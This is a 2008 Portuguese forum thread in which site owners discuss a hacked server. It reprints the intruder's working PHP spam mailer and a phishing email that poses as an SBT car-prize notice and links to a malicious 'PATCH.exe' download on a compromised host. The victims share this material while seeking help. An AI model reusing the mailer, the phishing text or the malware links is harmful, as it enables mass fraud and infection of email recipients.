kllaus

Bah... Desisto, agora virou moda essa bagaça...

Quer saber? Apaguei meu site e estou fazendo outro...



Esse primeiro verifiquei, o arquivo windows.txt

Existem várias formas de fazer isso...

Você pode usar apenas condicional, switch, função in_array()...

Qualquer dúvida, poste em PHP.

Agora que percebi uma parada, teu nick é sem.ponto e o site mencionado acima veio através do www.semponto.com.br, por um acaso era tu fazendo isso também?

Você tem que verificar o nome antes de liberar a include, senão fica muito inseguro.

Como eu faço isso?

Olá pessoal.

Depois de muito tempo o xxxxxx voltou a atacar, eis os novos dados do safado.



O novo Código capturado é:

<?php

set_time_limit(0);

if($manda)
{
//EMAIL DO DESTINAT?RIO
$destinatario = "$remetente";

//ASSUNTO DO EMAIL
$assunto = "$assunto";

//MENSAGEM DO EMAIL
$mensagem = $html;
$mensagem = stripslashes($mensagem);
//CABE?ALHO DO EMAIL
$headers  = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
/* headers adicionais */
$headers .= "From:<$remetente>\r\n";
$headers .= "Cc: $remetente\r\n";
$headers .= "Bcc: e$remetente\r\n";

//ARQUIVO COM OS EMAILS
$arquivo = $lista;

//LENDO ARQUIVO
$file = explode("\n", $arquivo);
$i = 1;


?><title>spamer priv thundercash</title>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<p>&nbsp;</p>
<?
if($manda) { ?>
<table width="59%" height="30" border="0" align="center" cellpadding="2" cellspacing="1" bgcolor="#333333">
  <tr>
	<td bgcolor="#f5f5f5"> 
	  <?
	foreach ($file as $mail) {

				if(mail($mail, $assunto, $mensagem, $headers))

					echo "<font color=green face=verdana size=1>* $i - ".$mail."</font> <font color=green face=verdana size=1>uiauia</font><br>";

				else

					echo "* $i  ".$email[$i]." <font color=red>Não foi!</font><br><hr>";

$i++;
	 

}
}
?>
	</td>
  </tr>
</table><? } ?>
<form name="form1" method="post" action="">
  <table width="47%" height="202" border="0" align="center" cellpadding="0" cellspacing="2" bgcolor="#666666">
	<tr> 
	  <td bgcolor="#FFFFFF"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
		  <tr> 
			<td colspan="3" bgcolor="#636666"> <div align="center"><font color="#FFFFFF" size="4" face="Verdana, Arial, Helvetica, sans-serif"><b> 
				</b></font></div></td>
		  </tr>
		  <tr> 
			<td width="21%"><div align="center"><font color="#4A03000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">ASSUNTO:</font></b></font></div></td>
			<td width="1%" bgcolor="#616666">&nbsp;</td>
			<td width="78%">
			<input name="assunto" type="text" id="assunto3" size="50" value="FOTOS"></td>
		  </tr>
		  <tr> 
			<td><div align="center"><font color="#4A033000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">REMETENTE:</font></b></font></div></td>
			<td bgcolor="#66623666">&nbsp;</td>
			<td>
			<input name="remetente" type="text" id="remetente3" value="notification@live-messenger.com" size="24"></td>
		  </tr>
		  <tr> 
			<td><div align="center"><font color="#4A10000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">CODIGO HTML:</font></b></font></div></td>
			<td bgcolor="#6666366">&nbsp;</td>
			<td><textarea name="html" cols="30" rows="4" id="textarea2">
<html>
<head>
<p><font face=Arial size=3>Oie!!<br>
tudo bem? eu esqueci de mandar as fotos! agora ta ai!!<br>
Beijao!<br>
<p>anexo:
<p><font face=Arial size=3><a href="[ENDEREÇO REMOVIDO]">foto01.jpg (185kb)
<p><font face=Arial size=3><a href="[ENDEREÇO REMOVIDO]">foto02.jpg (183kb)
<p><font face=Arial size=3><a href="[ENDEREÇO REMOVIDO]">foto03.jpg (178kb)
</a></font></p>
</body>
</html>

</textarea></td>
		  </tr>
		  <tr> 
			<td><div align="center"><font color="#4A0000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">EMAILS:</font></b></font></div></td>
			<td bgcolor="#6666266">&nbsp;</td>
			<td><textarea name="lista" cols="40" rows="10" id="textarea3"></textarea></td>
		  </tr>
		  <tr> 
			<td><div align="center"></div></td>
			<td bgcolor="#6662666">&nbsp;</td>
			<td>&nbsp;</td>
		  </tr>
		  <tr> 
			<td>&nbsp;</td>
			<td bgcolor="#6626666">&nbsp;</td>
			<td><div align="center"> 
				<input name="manda" type="submit" id="manda" value="Send!">
			  </div></td>
		  </tr>
		  <tr> 
			<td height="23">&nbsp;</td>
			<td bgcolor="#6662666">&nbsp;</td>
			<td><div align="center"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
				<b></b></font></div></td>
		  </tr>
		</table></td>
	</tr>
  </table>
</form>

O que leva para o seguinte formulário:




Olhei no DreamWeaver e o código gera o seguinte E-mail:




Alguém tem uma solução?

brow, experimenta antes de mais nada trocar o seu browser, usa FireFox

Não entendi a do browser, pois creio não influenciar no que ELE utilizará.

Mas ontem ele entrou de novo e o bloqueei novamente, por enquanto estou nessa de gato e rato, ele entra e eu bloqueio, vamos ver quem cansa primeiro.

Hoje também verifiquei mais dois arquivos que não tinha visto anteriormente.

Tinha os seguintes arquivos no meu root:

.htaccess
.htaccess(1)
.htaccess18511c22c61f0a5a

Apaguei os dois últimos e substituí o primeiro por um que eu tinha aqui do meu fullbackup.

Até o momento ele não entrou de novo, vamos ver o que acontece.

mesmo se você colocar o código normal, o hacker volta a colocar esse código acima?

Ele não coloca esse código, esse código é o que mostrava o link que eu detectei qd ele entrou, pois uso o Kayako Support Suite e ele mostra em que página o usuário está

Verificando hoje na minha caixa de SPAM, encontrei o E-mail que o fulano envia, eis uma imagem do E-mail:



Abaixo está o código fonte da mensagem:

Delivered-To: forum@cjcinformatica.com.br
Received: by 10.66.238.12 with SMTP id l12cs179420ugh;
		Thu, 13 Mar 2008 16:09:16 -0700 (PDT)
Received: by 10.114.157.1 with SMTP id f1mr10548621wae.10.1205449754029;
		Thu, 13 Mar 2008 16:09:14 -0700 (PDT)
Return-Path: <anonymous@spacecollective.org>
Received: from spacecollective.org (spacecollective.org [72.47.204.44])
		by mx.google.com with ESMTP id k26si7203349waf.8.2008.03.13.16.09.12;
		Thu, 13 Mar 2008 16:09:13 -0700 (PDT)
Received-SPF: pass (google.com: best guess record for domain of anonymous@spacecollective.org designates 72.47.204.44 as permitted sender) client-ip=72.47.204.44;
Authentication-Results: mx.google.com; spf=pass (google.com: best guess record for domain of anonymous@spacecollective.org designates 72.47.204.44 as permitted sender) smtp.mail=anonymous@spacecollective.org
Received: (qmail 25980 invoked by uid 48); 11 Mar 2008 09:08:50 -0700
Date: 11 Mar 2008 09:08:50 -0700
Message-ID: <20080311160850.25977.qmail@spacecollective.org>
content-type: text/html
Subject: COMUNICADO SBT
From: notification@live-messenger.com
To: forum@cjcinformatica.com.br

<html>

<head>

  <meta content="text/html; charset=ISO-8859-1" http-equiv="content-type">

  <title>SBT</title>

</head>

<body>

<img alt="" src="http://www.sbt.com.br/images/img0int01.jpg"><br>

<br>

<br>

<br>

<span style="color: rgb(255, 0, 0);">Web Gugu 2008 Domingo Legal!!!</span></a></span><br><br>

<small style="font-weight: bold; color: rgb(51, 51, 153);"><br>

</small><span style="font-weight: bold; color: rgb(51, 51, 153);">Informamos que você foi premiado e ganhou 1 Gol Flex Power 2008 0km.</span><br style="font-weight: bold; color: rgb(51, 51, 153);">

<span style="font-weight: bold; color: rgb(51, 51, 153);">Para maiores informações instale o patch de segurança.</span><br style="font-weight: bold; color: rgb(51, 51, 153);">

<br style="font-weight: bold; color: rgb(51, 51, 153);">

<span style="font-weight: bold; color: rgb(51, 51, 153);">Patch de segurança( <a href="http://tsahq.gmoserver.com/administrator/includes/pcl/PATCH.exe"><span style="color: rgb(255, 0, 0);">CLIQUE AQUI!!!</span></a> )</span><br>

<br>

 <span style="font-weight: bold; color: rgb(51, 51, 153);">Logo em seguida Adicione o seu número de identificação no link abaixo para podermos confirmar seu premio!!!</span><br>

<br>

<span style="color: rgb(255, 0, 0);">NÚMERO: [ 3454776 ]</span></a></span><br><br>

<br>

<span style="font-weight: bold; color: rgb(51, 51, 153);">LINK:( <a href="http://www.gleamgirls.com/administrator/components/com_comprofiler/errors/sbt.html"><span style="color: rgb(255, 0, 0);">http://www.sbt.com.br/domingolegal</span></a> )</span><br>

</body>

</html>

Como sugerido, eis os prints.

O primeiro link usando meu site envia para a imagem abaixo:



O formulário foi tirado do ar, pois o segundo link leva à imagem abaixo:



Mas o código do segundo link está abaixo, era o que mostrava o segundo link:

<?php

set_time_limit(0);

if($manda)
{
//EMAIL DO DESTINAT?RIO
$destinatario = "$remetente";

//ASSUNTO DO EMAIL
$assunto = "$assunto";

//MENSAGEM DO EMAIL
$mensagem = $html;
$mensagem = stripslashes($mensagem);
//CABE?ALHO DO EMAIL
$headers  = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
/* headers adicionais */
$headers .= "From:<$remetente>\r\n";
$headers .= "Cc: $remetente\r\n";
$headers .= "Bcc: e$remetente\r\n";

//ARQUIVO COM OS EMAILS
$arquivo = $lista;

//LENDO ARQUIVO
$file = explode("\n", $arquivo);
$i = 1;


?><title>spamer priv thundercash</title>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<p>&nbsp;</p>
<?
if($manda) { ?>
<table width="59%" height="30" border="0" align="center" cellpadding="2" cellspacing="1" bgcolor="#333333">
  <tr>
	<td bgcolor="#f5f5f5"> 
	  <?
   foreach ($file as $mail) {

			if(mail($mail, $assunto, $mensagem, $headers))

			   echo "<font color=green face=verdana size=1>* $i - ".$mail."</font> <font color=green face=verdana size=1>uiauia</font><br>";

			else

			   echo "* $i  ".$email[$i]." <font color=red>Não foi!</font><br><hr>";

$i++;
	

}
}
?>
	</td>
  </tr>
</table><? } ?>
<form name="form1" method="post" action="">
  <table width="47%" height="202" border="0" align="center" cellpadding="0" cellspacing="2" bgcolor="#666666">
	<tr> 
	  <td bgcolor="#FFFFFF"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
		  <tr> 
			<td colspan="3" bgcolor="#636666"> <div align="center"><font color="#FFFFFF" size="4" face="Verdana, Arial, Helvetica, sans-serif"><b> 
				</b></font></div></td>
		  </tr>
		  <tr> 
			<td width="21%"><div align="center"><font color="#4A03000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">ASSUNTO:</font></b></font></div></td>
			<td width="1%" bgcolor="#616666">&nbsp;</td>
			<td width="78%">
		 <input name="assunto" type="text" id="assunto3" size="50" value="COMUNICADO SBT BRASIL"></td>
		  </tr>
		  <tr> 
			<td><div align="center"><font color="#4A033000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">REMETENTE:</font></b></font></div></td>
			<td bgcolor="#66623666">&nbsp;</td>
			<td>
		 <input name="remetente" type="text" id="remetente3" value="notification@live-messenger.com" size="24"></td>
		  </tr>
		  <tr> 
			<td><div align="center"><font color="#4A10000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">CODIGO HTML:</font></b></font></div></td>
			<td bgcolor="#6666366">&nbsp;</td>
			<td><textarea name="html" cols="30" rows="4" id="textarea2">
<html>
<head>
  <meta content="text/html; charset=ISO-8859-1" http-equiv="content-type">
  <title>SBT</title>
</head>
<body>
<img alt="" src="http://www.sbt.com.br/images/img0int01.jpg"><br>
<br>
<br>
<br>
<span style="color: rgb(255, 0, 0);">Web Gugu 2008 Domingo Legal!!!</span></a></span><br><br>
<small style="font-weight: bold; color: rgb(51, 51, 153);"><br>
</small><span style="font-weight: bold; color: rgb(51, 51, 153);">Informamos que você foi premiado e ganhou 1 Gol Flex Power 2008 0km.</span><br style="font-weight: bold; color: rgb(51, 51, 153);">
<span style="font-weight: bold; color: rgb(51, 51, 153);">Para maiores informações instale o patch de segurança.</span><br style="font-weight: bold; color: rgb(51, 51, 153);">
<br style="font-weight: bold; color: rgb(51, 51, 153);">
<span style="font-weight: bold; color: rgb(51, 51, 153);">Patch de segurança( <a href="http://tsahq.gmoserver.com/administrator/includes/pcl/PATCH.exe"><span style="color: rgb(255, 0, 0);">CLIQUE AQUI!!!</span></a> )</span><br>
<br>
<span style="font-weight: bold; color: rgb(51, 51, 153);">Logo em seguida Adicione o seu número de identificação no link abaixo para podermos confirmar seu premio!!!</span><br>
<br>
<span style="color: rgb(255, 0, 0);">NÚMERO: [ 3454776 ]</span></a></span><br><br>
<br>
<span style="font-weight: bold; color: rgb(51, 51, 153);">LINK:( <a href="http://www.glazenwassenforreal.nl/images/sbt.html"><span style="color: rgb(255, 0, 0);">http://www.sbt.com.br/domingolegal</span></a> )</span><br>
</body>
</html>



</textarea></td>
		  </tr>
		  <tr> 
			<td><div align="center"><font color="#4A0000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">EMAILS:</font></b></font></div></td>
			<td bgcolor="#6666266">&nbsp;</td>
			<td><textarea name="lista" cols="40" rows="10" id="textarea3"></textarea></td>
		  </tr>
		  <tr> 
			<td><div align="center"></div></td>
			<td bgcolor="#6662666">&nbsp;</td>
			<td>&nbsp;</td>
		  </tr>
		  <tr> 
			<td>&nbsp;</td>
			<td bgcolor="#6626666">&nbsp;</td>
			<td><div align="center"> 
				<input name="manda" type="submit" id="manda" value="Send!">
			  </div></td>
		  </tr>
		  <tr> 
			<td height="23">&nbsp;</td>
			<td bgcolor="#6662666">&nbsp;</td>
			<td><div align="center"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
				<b></b></font></div></td>
		  </tr>
		</table></td>
	</tr>
  </table>
</form>

E agora que tentei entrar no segundo link e vi que está fora é que percebi, da hora do almoço pra cá ele não entrou mais, será que acabou meu pesadelo?